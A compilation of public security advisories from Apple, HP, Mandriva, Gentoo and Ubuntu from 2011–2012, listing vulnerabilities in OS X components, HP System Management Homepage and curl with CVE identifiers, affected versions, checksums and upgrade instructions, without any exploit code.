CoreAudio Available for: Mac OS X v10.6.8, Mac OS X Server v10.6.8 Impact: Playing maliciously crafted audio content may lead to an unexpected application termination or arbitrary code execution Description: A buffer overflow existed in the handling of AAC encoded audio streams. This issue does not affect OS X Lion systems. CVE-ID CVE-2011-3252 : Luigi Auriemma working with TippingPoint's Zero Day Initiative CoreMedia Available for: Mac OS X v10.6.8, Mac OS X Server v10.6.8, OS X Lion v10.7 to v10.7.2, OS X Lion Server v10.7 to v10.7.2 Impact: Viewing a maliciously crafted movie file may lead to an unexpected application termination or arbitrary code execution Description: A heap buffer overflow existed in CoreMedia's handling of H.264 encoded movie files. CVE-ID CVE-2011-3448 : Scott Stender of iSEC Partners CoreText Available for: Mac OS X v10.6.8, Mac OS X Server v10.6.8, OS X Lion v10.7 to v10.7.2, OS X Lion Server v10.7 to v10.7.2 Impact: Viewing or downloading a document containing a maliciously crafted embedded font may lead to an unexpected application termination or arbitrary code execution Description: A use after free issue existed in the handling of font files. CVE-ID CVE-2011-3449 : Will Dormann of the CERT/CC CoreUI Available for: OS X Lion v10.7 to v10.7.2, OS X Lion Server v10.7 to v10.7.2 Impact: Visiting a malicious website may lead to an unexpected application termination or arbitrary code execution Description: An unbounded stack allocation issue existed in the handling of long URLs. This issue does not affect systems prior to OS X Lion. CVE-ID CVE-2011-3450 : Ben Syverson curl Available for: Mac OS X v10.6.8, Mac OS X Server v10.6.8, OS X Lion v10.7 to v10.7.2, OS X Lion Server v10.7 to v10.7.2 Impact: A remote server may be able to impersonate clients via GSSAPI requests Description: When doing GSSAPI authentication, libcurl unconditionally performs credential delegation. This issue is addressed by disabling GSSAPI credential delegation. CVE-ID CVE-2011-2192 Data Security Available for: Mac OS X v10.6.8, Mac OS X Server v10.6.8, OS X Lion v10.7 to v10.7.2, OS X Lion Server v10.7 to v10.7.2 Impact: An attacker with a privileged network position may intercept user credentials or other sensitive information Description: Two certificate authorities in the list of trusted root certificates have independently issued intermediate certificates to DigiCert Malaysia. DigiCert Malaysia has issued certificates with weak keys that it is unable to revoke. An attacker with a privileged network position could intercept user credentials or other sensitive information intended for a site with a certificate issued by DigiCert Malaysia. This issue is addressed by configuring default system trust settings so that DigiCert Malaysia's certificates are not trusted. We would like to acknowledge Bruce Morton of Entrust, Inc. dovecot Available for: Mac OS X v10.6.8, Mac OS X Server v10.6.8, OS X Lion v10.7 to v10.7.2, OS X Lion Server v10.7 to v10.7.2 Impact: An attacker may be able to decrypt data protected by SSL Description: There are known attacks on the confidentiality of SSL 3.0 and TLS 1.0 when a cipher suite uses a block cipher in CBC mode. Dovecot disabled the 'empty fragment' countermeasure which prevented these attacks. This issue is addressed by enabling the countermeasure. CVE-ID CVE-2011-3389 : Apple filecmds Available for: Mac OS X v10.6.8, Mac OS X Server v10.6.8, OS X Lion v10.7 to v10.7.2, OS X Lion Server v10.7 to v10.7.2 Impact: Decompressing a maliciously crafted compressed file may lead to an unexpected application termination or arbitrary code execution Description: A buffer overflow existed in the 'uncompress' command line tool. CVE-ID CVE-2011-2895 ImageIO Available for: Mac OS X v10.6.8, Mac OS X Server v10.6.8 Impact: Viewing a maliciously crafted TIFF file may lead to an unexpected application termination or arbitrary code execution Description: A buffer overflow existed in ImageIO's handling of CCITT Group 4 encoded TIFF files. This issue does not affect OS X Lion systems. CVE-ID CVE-2011-0241 : Cyril CATTIAUX of Tessi Technologies ImageIO Available for: Mac OS X v10.6.8, Mac OS X Server v10.6.8, OS X Lion v10.7 to v10.7.2, OS X Lion Server v10.7 to v10.7.2 Impact: Viewing a maliciously crafted TIFF file may lead to an unexpected application termination or arbitrary code execution Description: A buffer overflow existed in libtiff's handling of ThunderScan encoded TIFF images. This issue is address by updating libtiff to version 3.9.5. CVE-ID CVE-2011-1167 ImageIO Available for: Mac OS X v10.6.8, Mac OS X Server v10.6.8, OS X Lion v10.7 to v10.7.2, OS X Lion Server v10.7 to v10.7.2 Impact: Multiple vulnerabilities in libpng 1.5.4 Description: libpng is updated to version 1.5.5 to address multiple vulnerabilities, the most serious of which may lead to arbitrary code execution. Further information is available via the libpng website at http://www.libpng.org/pub/png/libpng.html CVE-ID CVE-2011-3328 Internet Sharing Available for: OS X Lion v10.7 to v10.7.2, OS X Lion Server v10.7 to v10.7.2 Impact: A Wi-Fi network created by Internet Sharing may lose security settings after a system update Description: After updating to a version of OS X Lion prior to 10.7.3, the Wi-Fi configuration used by Internet Sharing may revert to factory defaults, which disables the WEP password. This issue only affects systems with Internet Sharing enabled and sharing the connection to Wi-Fi. This issue is addressed by preserving the Wi-Fi configuration during a system update. CVE-ID CVE-2011-3452 : an anonymous researcher Libinfo Available for: OS X Lion v10.7 to v10.7.2, OS X Lion Server v10.7 to v10.7.2 Impact: Visiting a maliciously crafted website may lead to the disclosure of sensitive information Description: An issue existed in Libinfo's handling of hostname lookup requests. Libinfo could return incorrect results for a maliciously crafted hostname. This issue does not affect systems prior to OS X Lion. CVE-ID CVE-2011-3441 : Erling Ellingsen of Facebook libresolv Available for: Mac OS X v10.6.8, Mac OS X Server v10.6.8, OS X Lion v10.7 to v10.7.2, OS X Lion Server v10.7 to v10.7.2 Impact: Applications that use OS X's libresolv library may be vulnerable to an unexpected application termination or arbitrary code execution Description: An integer overflow existed in the parsing of DNS resource records, which may lead to heap memory corruption. CVE-ID CVE-2011-3453 : Ilja van Sprundel of IOActive libsecurity Available for: Mac OS X v10.6.8, Mac OS X Server v10.6.8, OS X Lion v10.7 to v10.7.2, OS X Lion Server v10.7 to v10.7.2 Impact: Some EV certificates may be trusted even if the corresponding root has been marked as untrusted Description: The certificate code trusted a root certificate to sign EV certificates if it was on the list of known EV issuers, even if the user had marked it as 'Never Trust' in Keychain. The root would not be trusted to sign non-EV certificates. CVE-ID CVE-2011-3422 : Alastair Houghton OpenGL Available for: Mac OS X v10.6.8, Mac OS X Server v10.6.8, OS X Lion v10.7 to v10.7.2, OS X Lion Server v10.7 to v10.7.2 Impact: Applications that use OS X's OpenGL implementation may be vulnerable to an unexpected application termination or arbitrary code execution Description: Multiple memory corruption issues existed in the handling of GLSL compilation. CVE-ID CVE-2011-3457 : Chris Evans of the Google Chrome Security Team, and Marc Schoenefeld of the Red Hat Security Response Team PHP Available for: Mac OS X v10.6.8, Mac OS X Server v10.6.8, OS X Lion v10.7 to v10.7.2, OS X Lion Server v10.7 to v10.7.2 Impact: Multiple vulnerabilities in PHP 5.3.6 Description: PHP is updated to version 5.3.8 to address several vulnerabilities, the most serious of which may lead to arbitrary code execution. Further information is available via the PHP web site at http://www.php.net CVE-ID CVE-2011-1148 CVE-2011-1657 CVE-2011-1938 CVE-2011-2202 CVE-2011-2483 CVE-2011-3182 CVE-2011-3189 CVE-2011-3267 CVE-2011-3268 PHP Available for: OS X Lion v10.7 to v10.7.2, OS X Lion Server v10.7 to v10.7.2 Impact: Viewing a maliciously crafted PDF file may lead to an unexpected application termination or arbitrary code execution Description: A memory corruption issue existed in FreeType's handling of Type 1 fonts. Further information is available via the FreeType site at http://www.freetype.org/ CVE-ID CVE-2011-3256 : Apple PHP Available for: Mac OS X v10.6.8, Mac OS X Server v10.6.8, OS X Lion v10.7 to v10.7.2, OS X Lion Server v10.7 to v10.7.2 Impact: Multiple vulnerabilities in libpng 1.5.4 Description: libpng is updated to version 1.5.5 to address multiple vulnerabilities, the most serious of which may lead to arbitrary code execution. Further information is available via the libpng website at http://www.libpng.org/pub/png/libpng.html CVE-ID CVE-2011-3328 QuickTime Available for: Mac OS X v10.6.8, Mac OS X Server v10.6.8, OS X Lion v10.7 to v10.7.2, OS X Lion Server v10.7 to v10.7.2 Impact: Opening a maliciously crafted MP4 encoded file may lead to an unexpected application termination or arbitrary code execution Description: An uninitialized memory access issue existed in the handling of MP4 encoded files. CVE-ID CVE-2011-3458 : Luigi Auriemma and pa_kt both working with TippingPoint's Zero Day Initiative QuickTime Available for: Mac OS X v10.6.8, Mac OS X Server v10.6.8, OS X Lion v10.7 to v10.7.2, OS X Lion Server v10.7 to v10.7.2 Impact: Viewing a maliciously crafted movie file may lead to an unexpected application termination or arbitrary code execution Description: A signedness issue existed in the handling of font tables embedded in QuickTime movie files. CVE-ID CVE-2011-3248 : Luigi Auriemma working with TippingPoint's Zero Day Initiative QuickTime Available for: Mac OS X v10.6.8, Mac OS X Server v10.6.8, OS X Lion v10.7 to v10.7.2, OS X Lion Server v10.7 to v10.7.2 Impact: Viewing a maliciously crafted movie file may lead to an unexpected application termination or arbitrary code execution Description: An off by one buffer overflow existed in the handling of rdrf atoms in QuickTime movie files. CVE-ID CVE-2011-3459 : Luigi Auriemma working with TippingPoint's Zero Day Initiative QuickTime Available for: Mac OS X v10.6.8, Mac OS X Server v10.6.8, OS X Lion v10.7 to v10.7.2, OS X Lion Server v10.7 to v10.7.2 Impact: Viewing a maliciously crafted JPEG2000 image file may lead to an unexpected application termination or arbitrary code execution Description: A buffer overflow existed in the handling of JPEG2000 files. CVE-ID CVE-2011-3250 : Luigi Auriemma working with TippingPoint's Zero Day Initiative QuickTime Available for: Mac OS X v10.6.8, Mac OS X Server v10.6.8, OS X Lion v10.7 to v10.7.2, OS X Lion Server v10.7 to v10.7.2 Impact: Processing a maliciously crafted PNG image may lead to an unexpected application termination or arbitrary code execution Description: A buffer overflow existed in the handling of PNG files. CVE-ID CVE-2011-3460 : Luigi Auriemma working with TippingPoint's Zero Day Initiative QuickTime Available for: Mac OS X v10.6.8, Mac OS X Server v10.6.8, OS X Lion v10.7 to v10.7.2, OS X Lion Server v10.7 to v10.7.2 Impact: Viewing a maliciously crafted movie file may lead to an unexpected application termination or arbitrary code execution Description: A buffer overflow existed in the handling of FLC encoded movie files CVE-ID CVE-2011-3249 : Matt 'j00ru' Jurczyk working with TippingPoint's Zero Day Initiative SquirrelMail Available for: Mac OS X v10.6.8, Mac OS X Server v10.6.8 Impact: Multiple vulnerabilities in SquirrelMail Description: SquirrelMail is updated to version 1.4.22 to address several vulnerabilities, the most serious of which is a cross-site scripting issue. This issue does not affect OS X Lion systems. Further information is available via the SquirrelMail web site at http://www.SquirrelMail.org/ CVE-ID CVE-2010-1637 CVE-2010-2813 CVE-2010-4554 CVE-2010-4555 CVE-2011-2023 Subversion Available for: Mac OS X v10.6.8, Mac OS X Server v10.6.8, OS X Lion v10.7 to v10.7.2, OS X Lion Server v10.7 to v10.7.2 Impact: Accessing a Subversion repository may lead to the disclosure of sensitive information Description: Subversion is updated to version 1.6.17 to address multiple vulnerabilities, the most serious of which may lead to the disclosure of sensitive information. Further information is available via the Subversion web site at http://subversion.tigris.org/ CVE-ID CVE-2011-1752 CVE-2011-1783 CVE-2011-1921 Time Machine Available for: OS X Lion v10.7 to v10.7.2, OS X Lion Server v10.7 to v10.7.2 Impact: A remote attacker may access new backups created by the user's system Description: The user may designate a remote AFP volume or Time Capsule to be used for Time Machine backups. Time Machine did not verify that the same device was being used for subsequent backup operations. An attacker who is able to spoof the remote volume could gain access to new backups created by the user's system. This issue is addressed by verifying the unique identifier associated with a disk for backup operations. CVE-ID CVE-2011-3462 : Michael Roitzsch of the Technische Universitat Dresden Tomcat Available for: Mac OS X v10.6.8, Mac OS X Server v10.6.8 Impact: Multiple vulnerabilities in Tomcat 6.0.32 Description: Tomcat is updated to version 6.0.33 to address multiple vulnerabilities, the most serious of which may lead to the disclosure of sensitive information. Tomcat is only provided on Mac OS X Server systems. This issue does not affect OS X Lion systems. Further information is available via the Tomcat site at http://tomcat.apache.org/ CVE-ID CVE-2011-2204 WebDAV Sharing Available for: OS X Lion Server v10.7 to v10.7.2 Impact: Local users may obtain system privileges Description: An issue existed in WebDAV Sharing's handling of user authentication. A user with a valid account on the server or one of its bound directories could cause the execution of arbitrary code with system privileges. This issue does not affect systems prior to OS X Lion. CVE-ID CVE-2011-3463 : Gordon Davisson of Crywolf Webmail Available for: OS X Lion v10.7 to v10.7.2, OS X Lion Server v10.7 to v10.7.2 Impact: Viewing a maliciously crafted e-mail message may lead to the disclosure of message content Description: A cross-site scripting vulnerability existed in the handling of mail messages. This issue is addressed by updating Roundcube Webmail to version 0.6. This issue does not affect systems prior to OS X Lion. Further information is available via the Roundcube site at http://trac.roundcube.net/ CVE-ID CVE-2011-2937 X11 Available for: Mac OS X v10.6.8, Mac OS X Server v10.6.8, OS X Lion v10.7 to v10.7.2, OS X Lion Server v10.7 to v10.7.2 Impact: Viewing a maliciously crafted PDF file may lead to an unexpected application termination or arbitrary code execution Description: A memory corruption issue existed in FreeType's handling of Type 1 fonts. Further information is available via the FreeType site at http://www.freetype.org/ CVE-ID CVE-2011-3256 : Apple OS X Lion v10.7.3 and Security Update 2012-001 may be obtained from the Software Update pane in System Preferences, or Apple's Software Downloads web site: http://www.apple.com/support/downloads/ The Software Update utility will present the update that applies to your system configuration. Only one is needed, either Security Update 2021-001 or OS X v10.7.3. For OS X Lion v10.7.2 The download file is named: MacOSXUpd10.7.3.dmg Its SHA-1 digest is: 7102fe8f9f47286c45dfa35f6e84e7f730493a7c For OS X Lion v10.7 and v10.7.1 The download file is named: MacOSXUpdCombo10.7.3.dmg Its SHA-1 digest is: 07dfce300f6801eb63d9ac13e0bec84e1862a16c For OS X Lion Server v10.7.2 The download file is named: MacOSXServerUpd10.7.3.dmg Its SHA-1 digest is: 55a9571635d4ec088c142d68132d0d69fcb8867d For OS X Lion Server v10.7 and v10.7.1 The download file is named: MacOSXServerUpdCombo10.7.3.dmg Its SHA-1 digest is: 2c87824f09734499ea166ea0617a3ac21ecf832b For Mac OS X v10.6.8 The download file is named: SecUpd2012-001Snow.dmg Its SHA-1 digest is: 40875ee8cb609bbaefc8f421a9c34cc353db42b8 For Mac OS X Server v10.6.8 The download file is named: SecUpdSrvr2012-001.dmg Its SHA-1 digest is: 53b3ca5548001a9920aeabed4a034c6e4657fe20 Information will also be posted to the Apple Security Updates web site: http://support.apple.com/kb/HT1222 This message is signed with Apple's Product Security PGP key, and details are available at: https://www.apple.com/support/security/pgp/ -----BEGIN PGP SIGNATURE----- Version: GnuPG/MacGPG2 v2.0.16 (Darwin) iQEcBAEBAgAGBQJPKYxNAAoJEGnF2JsdZQeeLiIIAMLhH2ipDFrhCsw/n4VDeF1V P6jSkGXC9tBBVMvw1Xq4c2ok4SI34bDfMlURAVR+dde/h6nIZR24aLQVoDLjJuIp RrO2dm1nQeozLJSx2NbxhVh54BucJdKp4xS1GkDNxkqcdh04RE9hRURXdKagnfGy 9P8QQPOQmKAiWos/LYhCPDInMfrpVNvEVwP8MCDP15g6hylN4De/Oyt7ZshPshSf MnAFObfBTGX5KioVqTyfdlBkKUfdXHJux61QEFHn8eadX6+/6IuKbUvK9B0icc8E pvbjOxQatFRps0KNWeIsKQc5i6iQoJhocAiIy6Y6LCuZQuSXCImY2RWXkVYzbWo= =c1eU -----END PGP SIGNATURE----- . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c03280632 Version: 1 HPSBMU02764 SSRT100827 rev.1 - HP System Management Homepage (SMH) Running on Linux and Windows, Remote Cross Site Request Forgery (CSRF), Denial of Service (DoS), Execution of Arbitrary Code, Other Vulnerabilities NOTICE: The information in this Security Bulletin should be acted upon as soon as possible. Release Date: 2012-04-16 Last Updated: 2012-04-16 Potential Security Impact: Remote cross site request forgery (CSRF), Denial of Service (DoS), execution of arbitrary code, other vulnerabilities Source: Hewlett-Packard Company, HP Software Security Response Team VULNERABILITY SUMMARY Potential security vulnerabilities have been identified with HP System Management Homepage (SMH) running on Linux and Windows. The vulnerabilities could be exploited remotely and locally resulting in cross site request forgery (CSRF), Denial of Service (DoS), execution of arbitrary code, and other vulnerabilities. HP System Management Homepage (SMH) before v7.0 running on Linux and Windows. BACKGROUND CVSS 2.0 Base Metrics =========================================================== Reference Base Vector Base Score CVE-2009-0037 (AV:N/AC:M/Au:N/C:P/I:P/A:P) 6.8 CVE-2010-0734 (AV:N/AC:M/Au:N/C:P/I:P/A:P) 6.8 CVE-2010-1452 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2010-1623 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2010-2068 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0 CVE-2010-2791 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0 CVE-2010-3436 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0 CVE-2010-4409 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2010-4645 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2011-0014 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2011-0195 (AV:N/AC:M/Au:N/C:P/I:N/A:N) 4.3 CVE-2011-0419 (AV:N/AC:M/Au:N/C:N/I:N/A:P) 4.3 CVE-2011-1148 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2011-1153 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2011-1464 (AV:N/AC:M/Au:N/C:N/I:N/A:P) 4.3 CVE-2011-1467 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2011-1468 (AV:N/AC:M/Au:N/C:N/I:N/A:P) 4.3 CVE-2011-1470 (AV:N/AC:M/Au:N/C:N/I:N/A:P) 4.3 CVE-2011-1471 (AV:N/AC:M/Au:N/C:N/I:N/A:P) 4.3 CVE-2011-1928 (AV:N/AC:M/Au:N/C:N/I:N/A:P) 4.3 CVE-2011-1938 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2011-1945 (AV:N/AC:H/Au:N/C:P/I:N/A:N) 2.6 CVE-2011-2192 (AV:N/AC:M/Au:N/C:P/I:N/A:N) 4.3 CVE-2011-2202 (AV:N/AC:L/Au:N/C:N/I:P/A:P) 6.4 CVE-2011-2483 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0 CVE-2011-3182 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2011-3189 (AV:N/AC:M/Au:N/C:P/I:N/A:N) 4.3 CVE-2011-3192 (AV:N/AC:L/Au:N/C:N/I:N/A:C) 7.8 CVE-2011-3267 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2011-3268 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2011-3207 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0 CVE-2011-3210 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2011-3348 (AV:N/AC:M/Au:N/C:N/I:N/A:P) 4.3 CVE-2011-3368 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0 CVE-2011-3639 (AV:N/AC:M/Au:N/C:N/I:P/A:N) 4.3 CVE-2011-3846 (AV:N/AC:M/Au:N/C:P/I:P/A:P) 6.8 CVE-2011-4317 (AV:N/AC:M/Au:N/C:N/I:P/A:N) 4.3 CVE-2012-0135 (AV:N/AC:M/Au:S/C:N/I:N/A:P) 3.5 CVE-2012-1993 (AV:L/AC:L/Au:S/C:P/I:P/A:N) 3.2 =========================================================== Information on CVSS is documented in HP Customer Notice: HPSN-2008-002 The Hewlett-Packard Company thanks Sow Ching Shiong coordinating with Secunia for reporting CVE-2011-3846 to security-alert@hp.com. RESOLUTION HP has provided HP System Management Homepage v7.0 or subsequent to resolve the vulnerabilities. SMH v7.0 is available here: http://h18000.www1.hp.com/products/servers/management/agents/index.html HISTORY Version:1 (rev.1) 16 April 2012 Initial release Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy. Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HP Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-alert@hp.com. Report: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com Subscribe: To initiate a subscription to receive future HP Security Bulletin alerts via Email: http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins Security Bulletin List: A list of HP Security Bulletins, updated periodically, is contained in HP Security Notice HPSN-2011-001: https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c02964430 Security Bulletin Archive: A list of recently released Security Bulletins is available here: http://h20566.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/ Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB. 3C = 3COM 3P = 3rd Party Software GN = HP General Software HF = HP Hardware and Firmware MP = MPE/iX MU = Multi-Platform Software NS = NonStop Servers OV = OpenVMS PI = Printing and Imaging PV = ProCurve ST = Storage Software TU = Tru64 UNIX UX = HP-UX Copyright 2012 Hewlett-Packard Development Company, L.P. Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits;damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.10 (GNU/Linux) iEYEARECAAYFAk+MKDYACgkQ4B86/C0qfVkIIgCeIhDxobSe39v5hyk0GRrO6Zaw OHIAoMmRE1imNBs6CtS/6/l1kZY3fwop =hsl/ -----END PGP SIGNATURE----- . Packages for 2009.0 are provided as of the Extended Maintenance Program. Please visit this link to learn more: http://store.mandriva.com/product_info.php?cPath=149&amp;products_id=490 The updated packages have been patched to correct this issue. _______________________________________________________________________ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2192 _______________________________________________________________________ Updated Packages: Mandriva Linux 2009.0: efa7576a48725c44f2f53eb42e9f5a24 2009.0/i586/curl-7.19.0-2.5mdv2009.0.i586.rpm 51928c0f801f157351f3843f794c2ec9 2009.0/i586/curl-examples-7.19.0-2.5mdv2009.0.i586.rpm 3e8584e39fc7946ffdc4ddd7c0a23b78 2009.0/i586/libcurl4-7.19.0-2.5mdv2009.0.i586.rpm 5b48546182e7323b1b95e3b084a63d1e 2009.0/i586/libcurl-devel-7.19.0-2.5mdv2009.0.i586.rpm e2ba5684e62b6ad3ed4e2ed8fe974a37 2009.0/SRPMS/curl-7.19.0-2.5mdv2009.0.src.rpm Mandriva Linux 2009.0/X86_64: fd13f40cfeba7fab958fdcc3eec98f9c 2009.0/x86_64/curl-7.19.0-2.5mdv2009.0.x86_64.rpm 8078cbc6bdb189e5c105d0eef53f3ad1 2009.0/x86_64/curl-examples-7.19.0-2.5mdv2009.0.x86_64.rpm e319ecc8e70c0d222ec021c6bf2b884e 2009.0/x86_64/lib64curl4-7.19.0-2.5mdv2009.0.x86_64.rpm d43e6b3b4caa23d483d4205c19a4127f 2009.0/x86_64/lib64curl-devel-7.19.0-2.5mdv2009.0.x86_64.rpm e2ba5684e62b6ad3ed4e2ed8fe974a37 2009.0/SRPMS/curl-7.19.0-2.5mdv2009.0.src.rpm Mandriva Linux 2010.1: 1f3c2a90fb01fcc2719bce3e9645c66b 2010.1/i586/curl-7.20.1-2.1mdv2010.2.i586.rpm b1c758033beb896b902fa0ba418756b3 2010.1/i586/curl-examples-7.20.1-2.1mdv2010.2.i586.rpm a8c2de51650c92a409aba918c15697b2 2010.1/i586/libcurl4-7.20.1-2.1mdv2010.2.i586.rpm 650e33c87271d5c4f2e5b698c8de972e 2010.1/i586/libcurl-devel-7.20.1-2.1mdv2010.2.i586.rpm 1488b217fbc0731d77e79540444b54a9 2010.1/SRPMS/curl-7.20.1-2.1mdv2010.2.src.rpm Mandriva Linux 2010.1/X86_64: be7a877b6af363e470630d4edd1b65ab 2010.1/x86_64/curl-7.20.1-2.1mdv2010.2.x86_64.rpm fdea83447b30e83229eda4c4dd9e3eaf 2010.1/x86_64/curl-examples-7.20.1-2.1mdv2010.2.x86_64.rpm 47eb4d21393bc10329bdcc7fed3105ec 2010.1/x86_64/lib64curl4-7.20.1-2.1mdv2010.2.x86_64.rpm d074056b2ec8e0af34d6fb63de9e9259 2010.1/x86_64/lib64curl-devel-7.20.1-2.1mdv2010.2.x86_64.rpm 1488b217fbc0731d77e79540444b54a9 2010.1/SRPMS/curl-7.20.1-2.1mdv2010.2.src.rpm Mandriva Enterprise Server 5: c1ca16b888b0873a9dfe7b7d62922b7d mes5/i586/curl-7.19.0-2.5mdvmes5.2.i586.rpm a00a332d35f477c84e9d92fb52f1ec49 mes5/i586/curl-examples-7.19.0-2.5mdvmes5.2.i586.rpm de1a06a70f3850d1fe4fdf62e355dce1 mes5/i586/libcurl4-7.19.0-2.5mdvmes5.2.i586.rpm 8a1797aca267e5eec1b5ff5da16527a6 mes5/i586/libcurl-devel-7.19.0-2.5mdvmes5.2.i586.rpm febf373948a2a1caae63d4c0645483e6 mes5/SRPMS/curl-7.19.0-2.5mdvmes5.2.src.rpm Mandriva Enterprise Server 5/X86_64: 1a4bedbbcc5e6c5f58f44bbd70818266 mes5/x86_64/curl-7.19.0-2.5mdvmes5.2.x86_64.rpm e24a7d74b4967bd4575ca66a09c5c2bf mes5/x86_64/curl-examples-7.19.0-2.5mdvmes5.2.x86_64.rpm 8adb8518393e336ba74ae0ce40ec0ac5 mes5/x86_64/lib64curl4-7.19.0-2.5mdvmes5.2.x86_64.rpm 809213447e1ef7e785960ca354396a18 mes5/x86_64/lib64curl-devel-7.19.0-2.5mdvmes5.2.x86_64.rpm febf373948a2a1caae63d4c0645483e6 mes5/SRPMS/curl-7.19.0-2.5mdvmes5.2.src.rpm _______________________________________________________________________ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 201203-02 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: cURL: Multiple vulnerabilities Date: March 06, 2012 Bugs: #308645, #373235, #400799 ID: 201203-02 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis ======== Multiple vulnerabilities have been found in cURL, the worst of which might allow remote execution of arbitrary code. Background ========== cURL is a command line tool for transferring files with URL syntax, supporting numerous protocols. Affected packages ================= ------------------------------------------------------------------- Package / Vulnerable / Unaffected ------------------------------------------------------------------- 1 net-misc/curl < 7.24.0 >= 7.24.0 Description =========== Multiple vulnerabilities have been found in cURL: * When zlib is enabled, the amount of data sent to an application for automatic decompression is not restricted (CVE-2010-0734). * When SSL is enabled, cURL improperly disables the OpenSSL workaround to mitigate an information disclosure vulnerability in the SSL and TLS protocols (CVE-2011-3389). * libcurl does not properly verify file paths for escape control characters in IMAP, POP3 or SMTP URLs (CVE-2012-0036). Impact ====== A remote attacker could entice a user or automated process to open a specially crafted file or URL using cURL, possibly resulting in the remote execution of arbitrary code, a Denial of Service condition, disclosure of sensitive information, or unwanted actions performed via the IMAP, POP3 or SMTP protocols. Workaround ========== There is no known workaround at this time. Resolution ========== All cURL users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=net-misc/curl-7.24.0" References ========== [ 1 ] CVE-2010-0734 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0734 [ 2 ] CVE-2011-2192 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2192 [ 3 ] CVE-2011-3389 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3389 [ 4 ] CVE-2012-0036 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0036 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-201203-02.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org. License ======= Copyright 2012 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 . ========================================================================== Ubuntu Security Notice USN-1158-1 June 24, 2011 curl vulnerabilities ========================================================================== A security issue affects these releases of Ubuntu and its derivatives: - Ubuntu 11.04 - Ubuntu 10.10 - Ubuntu 10.04 LTS - Ubuntu 8.04 LTS Summary: Multiple vulnerabilities in curl. This might allow an attacker to cause a denial of service via an application crash or possibly execute arbitrary code with the privilege of the application. This issue only affected Ubuntu 8.04 LTS and Ubuntu 10.04 LTS. (CVE-2010-0734) USN 818-1 fixed an issue with curl's handling of SSL certificates with zero bytes in the Common Name. Due to a packaging error, the fix for this issue was not being applied during the build. This issue only affected Ubuntu 8.04 LTS. We apologize for the error. (CVE-2009-2417) Original advisory details: Scott Cantor discovered that curl did not correctly handle SSL certificates with zero bytes in the Common Name. A remote attacker could exploit this to perform a man in the middle attack to view sensitive information or alter encrypted communications. Update instructions: The problem can be corrected by updating your system to the following package versions: Ubuntu 11.04: libcurl3 7.21.3-1ubuntu1.2 libcurl3-gnutls 7.21.3-1ubuntu1.2 libcurl3-nss 7.21.3-1ubuntu1.2 Ubuntu 10.10: libcurl3 7.21.0-1ubuntu1.1 libcurl3-gnutls 7.21.0-1ubuntu1.1 Ubuntu 10.04 LTS: libcurl3 7.19.7-1ubuntu1.1 libcurl3-gnutls 7.19.7-1ubuntu1.1 Ubuntu 8.04 LTS: libcurl3 7.18.0-1ubuntu2.3 libcurl3-gnutls 7.18.0-1ubuntu2.3 After a standard system update you need to restart any applications that make use of libcurl to make all the necessary changes. References: 